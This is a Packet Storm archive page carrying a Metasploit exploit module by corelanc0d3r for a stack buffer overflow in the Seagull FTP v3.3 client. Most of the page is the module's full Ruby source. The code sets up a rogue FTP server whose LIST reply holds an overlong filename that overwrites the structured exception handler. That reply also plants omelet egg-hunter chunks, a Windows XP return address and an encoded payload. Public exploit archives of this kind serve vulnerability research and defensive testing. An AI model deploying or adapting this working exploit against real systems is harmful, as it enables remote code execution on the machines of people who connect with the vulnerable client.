exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Seagull FTP v3.3 build 409 Stack Buffer Overflow

Seagull FTP v3.3 build 409 Stack Buffer Overflow
Posted Oct 13, 2010
Authored by corelanc0d3r | Site metasploit.com

This Metasploit module exploits a buffer overflow in the Seagull FTP client that gets triggered when the ftp clients processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler.

tags | exploit, overflow
SHA-256 | 9941cb1e0eab82770705bd52bcc11e247b265de2b6214cf38bf56899f9ca66c6

Seagull FTP v3.3 build 409 Stack Buffer Overflow

Change Mirror Download
##
# $Id: seagull_list_reply.rb 10661 2010-10-12 18:40:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Omelet

def initialize(info = {})
super(update_info(info,
'Name' => 'Seagull FTP v3.3 build 409 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Seagull FTP client that gets
triggered when the ftp clients processes a response to a LIST command. If the
response contains an overly long file/folder name, a buffer overflow occurs,
overwriting a structured exception handler.
},
'Author' =>
[
'corelanc0d3r' # found bug, wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision: 10661 $",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => '\x00',
'StackAdjustment' => -1500,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP Universal', { 'Offset' => 232, 'Ret' => 0x7CE4650C } ], # jmp esp shell32.dll
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end

#---------------------------------------------------------------------------------

def setup
super
end

def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end

def on_client_command_list(c,arg)
print_status("Handling LIST command")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")

crash = "A" * target['Offset']
crash << [target.ret].pack('V')

#corelanc0d3r's omelet mixin
thepayload = ("\x90" * 30) + payload.encoded

omeletoptions =
{
:eggsize => 123,
:eggtag => "00w",
:searchforward => true,
:reset => false,
:checksum => true
}
badchars = '\x00'
omelet = generate_omelet(thepayload,badchars,omeletoptions)

omeletcode = omelet[0]
print_status("[+] Omelet code : #{omeletcode.length} bytes")
print_status("[+] Number of eggs : #{omelet[1].length}")
print_status("[+] Sending payload")
crash << ("\x90" * 30) + omeletcode

print_status(" - Sending directory list via data connection")
dirlist = ""

omelet[1].each do |thischunk|
print_status(" [+] Planted egg of #{thischunk.length} bytes")
dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{thischunk}\r\n"
end
dirlist << "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{crash}\r\n"
conn.put("total #{omelet[1].length+1}\r\n"+dirlist)
conn.close
print_status(" - Wait for omelet hunter...")
return
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close